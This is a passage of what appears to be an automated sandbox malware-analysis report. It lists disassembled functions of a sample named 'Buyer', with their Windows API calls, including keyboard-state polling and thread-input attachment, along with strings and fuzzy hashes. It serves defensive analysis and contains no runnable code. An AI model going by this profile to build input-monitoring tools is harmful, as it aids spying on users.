                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FA023D
                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00FA024A
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FA0253
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FA0265
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FA0270
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2706829360-0
                                                                                                    • Opcode ID: 1a0b2ae8bf74a2c001e9bdfd6b22fa42b830d9af72c742cf4c5dc68aff8cb435
                                                                                                    • Instruction ID: 955d235b320040fe325b8280e39ab62590b63f9bf9aed1363f4b230f1ed658f6
                                                                                                    • Opcode Fuzzy Hash: 1a0b2ae8bf74a2c001e9bdfd6b22fa42b830d9af72c742cf4c5dc68aff8cb435
                                                                                                    • Instruction Fuzzy Hash: 5F413E75E0021DEFCF04DFA4DC48AEEBBB9EF49354F008069E915A7261DB34A945DBA0
                                                                                                    Function 00FAA36F Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?), ref: 00FAA397
                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00FAA418
                                                                                                    • GetKeyState.USER32(000000A0), ref: 00FAA433
                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00FAA44D
                                                                                                    • GetKeyState.USER32(000000A1), ref: 00FAA462
                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00FAA47A
                                                                                                    • GetKeyState.USER32(00000011), ref: 00FAA48C
                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00FAA4A4
                                                                                                    • GetKeyState.USER32(00000012), ref: 00FAA4B6
                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00FAA4CE
                                                                                                    • GetKeyState.USER32(0000005B), ref: 00FAA4E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State$Async$Keyboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 541375521-0
                                                                                                    • Opcode ID: e31471c1efcbe12f161b24972ee07ab8748cc5ef1e30596ef0b5771e6a95330a
                                                                                                    • Instruction ID: 0f7d06ea77e0ac10af54836d03006b9d69080ab80aa27ea98260858104939650
                                                                                                    • Opcode Fuzzy Hash: e31471c1efcbe12f161b24972ee07ab8748cc5ef1e30596ef0b5771e6a95330a
                                                                                                    • Instruction Fuzzy Hash: 9C41B8B0D047C969FF31DA7488083B9BEA16B17324F04805AE9C6461D2EBD599CCE763
                                                                                                    Function 00FC945A Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                    • API String ID: 707087890-567219261
                                                                                                    • Opcode ID: 5052b63137e6dde43e85bff857c001b0754a6e032e20e18cafefd1521306de9a
                                                                                                    • Instruction ID: 810bb7c3ed3c0819a6aa76249afa962441b1585d78eda57e22fa4db5769dbff0
                                                                                                    • Opcode Fuzzy Hash: 5052b63137e6dde43e85bff857c001b0754a6e032e20e18cafefd1521306de9a
                                                                                                    • Instruction Fuzzy Hash: A551ED32E084179BCB10DF68CA56EBDB3E1AF24324B64462DE826E72C4DB75DD41E790
                                                                                                    Function 00FB8904 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00FB89C6
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB89D6
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FB89E2
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB8A7F
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8A93
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8AC5
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FB8AFB
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8B04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1464919966-438819550
                                                                                                    • Opcode ID: 3d5a47c7bee2d681a36df82584cac3449c6cf9ccac6f6e618e27423a0d671ea6
                                                                                                    • Instruction ID: 77fd9b9e9ea45733c67c2e92adfedae8909cd28d86cfdf8a2a3b04cb6390bb7c
                                                                                                    • Opcode Fuzzy Hash: 3d5a47c7bee2d681a36df82584cac3449c6cf9ccac6f6e618e27423a0d671ea6
                                                                                                    • Instruction Fuzzy Hash: 2A615A725043059FCB10EF21C840AAAB7ECFF89364F04891EF99987251DB39E946DF92
                                                                                                    Function 00FB3AF7 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00FB3B3E
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00FB3B5F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString$_wcslen
                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                    • API String ID: 4099089115-3080491070
                                                                                                    • Opcode ID: 8b97a0e43b0ac84805a248eeb30bf4837c859293b011e5ca0df853216584038d
                                                                                                    • Instruction ID: a8f01cbbbcf8003e79deff7461fdaf8f59c48f99516298cb4b0a28c5ce6667a1
                                                                                                    • Opcode Fuzzy Hash: 8b97a0e43b0ac84805a248eeb30bf4837c859293b011e5ca0df853216584038d
                                                                                                    • Instruction Fuzzy Hash: 71516172940109ABDB15EBE0DD42EEEBB78AF04300F104465B90572162EB3D6F59EF61
                                                                                                    Function 00FB5B02 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00FB5B0F
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FB5B85
                                                                                                    • GetLastError.KERNEL32 ref: 00FB5B8F
                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00FB5C16
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                    • API String ID: 4194297153-14809454
                                                                                                    • Opcode ID: 9b91f8be4b8bdabafbc8094f50b8483f78180a2b36a8e0b6cc2c08c857efc842
                                                                                                    • Instruction ID: 9ac2d8d2e50234d0f5937a423f60b76c3a96a1b6fa38e3bf4383d77b5b7d3cda
                                                                                                    • Opcode Fuzzy Hash: 9b91f8be4b8bdabafbc8094f50b8483f78180a2b36a8e0b6cc2c08c857efc842
                                                                                                    • Instruction Fuzzy Hash: 1131DC76A006089FDB15EF69C884BAABBB5FB44714F148056E405CB292C778ED42EF90
                                                                                                    Function 00FD4404 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateMenu.USER32 ref: 00FD4437
                                                                                                    • SetMenu.USER32(?,00000000), ref: 00FD4446
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FD44CE
                                                                                                    • IsMenu.USER32(?), ref: 00FD44E2
                                                                                                    • CreatePopupMenu.USER32 ref: 00FD44EC
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FD4519
                                                                                                    • DrawMenuBar.USER32 ref: 00FD4521
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                    • String ID: 0$F
                                                                                                    • API String ID: 161812096-3044882817
                                                                                                    • Opcode ID: 3e1c9c5d4bccc73dffad03f736ab49900576d550a3d626e83d78670effaef4b0
                                                                                                    • Instruction ID: 240efe068c20032b35a585f2b44dfc639a9cfb4aca515c15c2581b5a29218ce9
                                                                                                    • Opcode Fuzzy Hash: 3e1c9c5d4bccc73dffad03f736ab49900576d550a3d626e83d78670effaef4b0
                                                                                                    • Instruction Fuzzy Hash: 5D413B75A02209AFDF14DF64E848BAA7BB6FF4A314F18002AF94597350D735A910EB50
                                                                                                    Function 00FA25C1 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00FA2646
                                                                                                    • GetDlgCtrlID.USER32 ref: 00FA2651
                                                                                                    • GetParent.USER32 ref: 00FA266D
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FA2670
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00FA2679
                                                                                                    • GetParent.USER32(?), ref: 00FA268D
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FA2690
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 711023334-1403004172
                                                                                                    • Opcode ID: f9701c04fbf281b0f7391d947ee251502432a542562008b4a31d73b5b7760f58
                                                                                                    • Instruction ID: 9be19f80e8d02701173910b44f3955bd7ad3782caa34d43168637822d2745ec9
                                                                                                    • Opcode Fuzzy Hash: f9701c04fbf281b0f7391d947ee251502432a542562008b4a31d73b5b7760f58
                                                                                                    • Instruction Fuzzy Hash: 7F2104B5E01218BBCF05AFA4CC94EEEBBB5EF06310F004546F961972D1CA799809FB60
                                                                                                    Function 00FA26A2 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00FA2725
                                                                                                    • GetDlgCtrlID.USER32 ref: 00FA2730
                                                                                                    • GetParent.USER32 ref: 00FA274C
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FA274F
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00FA2758
                                                                                                    • GetParent.USER32(?), ref: 00FA276C
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FA276F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 711023334-1403004172
                                                                                                    • Opcode ID: 7943e0c063bc450ad92d66a6744f5204307d3daa618f8cd65ad8f1e3876c3300
                                                                                                    • Instruction ID: e5080585505e746c86606aa16317b2677ba4ee496f86540538eef66d3885252a
                                                                                                    • Opcode Fuzzy Hash: 7943e0c063bc450ad92d66a6744f5204307d3daa618f8cd65ad8f1e3876c3300
                                                                                                    • Instruction Fuzzy Hash: 9421F6B5E01118BFCF01ABA4CC85EEEBFB9EF05300F004446BD51972A1C6799949FB60
                                                                                                    Function 00FD41E1 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FD425B
                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FD425E
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD4285
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FD42A8
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FD4320
                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FD436A
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FD4385
                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FD43A0
                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FD43B4
                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FD43D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 312131281-0
                                                                                                    • Opcode ID: 43344491d215a96430f6317b9d44f8a3eaf822ca31525d3882d13c3c81216bd1
                                                                                                    • Instruction ID: bb84601ffafcf701b71a0324db11be7dd8e5680014c60f0388ff7d6429b20f1e
                                                                                                    • Opcode Fuzzy Hash: 43344491d215a96430f6317b9d44f8a3eaf822ca31525d3882d13c3c81216bd1
                                                                                                    • Instruction Fuzzy Hash: 24616A75900208AFDB20DFA8CC81EEE77B9EB09710F14015AFA54EB3A1D774AE41EB50
                                                                                                    Function 00FAB830 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FAB852
                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB866
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00FAB86D
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB87C
                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FAB88E
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB8A7
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB8B9
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB8FE
                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB913
                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB91E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                    • String ID:
                                                                                                    • API String ID: 2156557900-0
                                                                                                    • Opcode ID: 588ce72b59f3a91b16fb02d8f9362b539468650ababbc65b7b72f8c7a3bf3511
                                                                                                    • Instruction ID: 4e15e5febb2d68fd323c81479973bca513e6710df812757528c0f840aa02138e
                                                                                                    • Opcode Fuzzy Hash: 588ce72b59f3a91b16fb02d8f9362b539468650ababbc65b7b72f8c7a3bf3511
                                                                                                    • Instruction Fuzzy Hash: 13318EF1A01208AFEB31DB25EC48FAA77A9EF46721F114015FA44D61A1D7BDD940AB60
                                                                                                    Function 00F72FD0 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00F72FE4
                                                                                                      • Part of subcall function 00F72D18: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4), ref: 00F72D2E
                                                                                                      • Part of subcall function 00F72D18: GetLastError.KERNEL32(01011DB4,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4,01011DB4), ref: 00F72D40
                                                                                                    • _free.LIBCMT ref: 00F72FF0
                                                                                                    • _free.LIBCMT ref: 00F72FFB
                                                                                                    • _free.LIBCMT ref: 00F73006
                                                                                                    • _free.LIBCMT ref: 00F73011
                                                                                                    • _free.LIBCMT ref: 00F7301C
                                                                                                    • _free.LIBCMT ref: 00F73027
                                                                                                    • _free.LIBCMT ref: 00F73032
                                                                                                    • _free.LIBCMT ref: 00F7303D
                                                                                                    • _free.LIBCMT ref: 00F7304B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 2792a61d7967d3d93b7a02b13cee0fab0a4bbd97ca5f58a629adc3eb95506410
                                                                                                    • Instruction ID: f2660d5b1b923938fbc9c0c25ee78f1726a228d786e5a83fa59d0719addd64cd
                                                                                                    • Opcode Fuzzy Hash: 2792a61d7967d3d93b7a02b13cee0fab0a4bbd97ca5f58a629adc3eb95506410
                                                                                                    • Instruction Fuzzy Hash: C311B676500109BFDB91EF54DC42CDD3BA9EF05350F6280A6FA0C9F622DA35DE50AB82
                                                                                                    Function 00F4433C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F44385
                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00F44424
                                                                                                    • UnregisterHotKey.USER32(?), ref: 00F44609
                                                                                                    • DestroyWindow.USER32(?), ref: 00F83D80
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00F83DE5
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F83E12
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
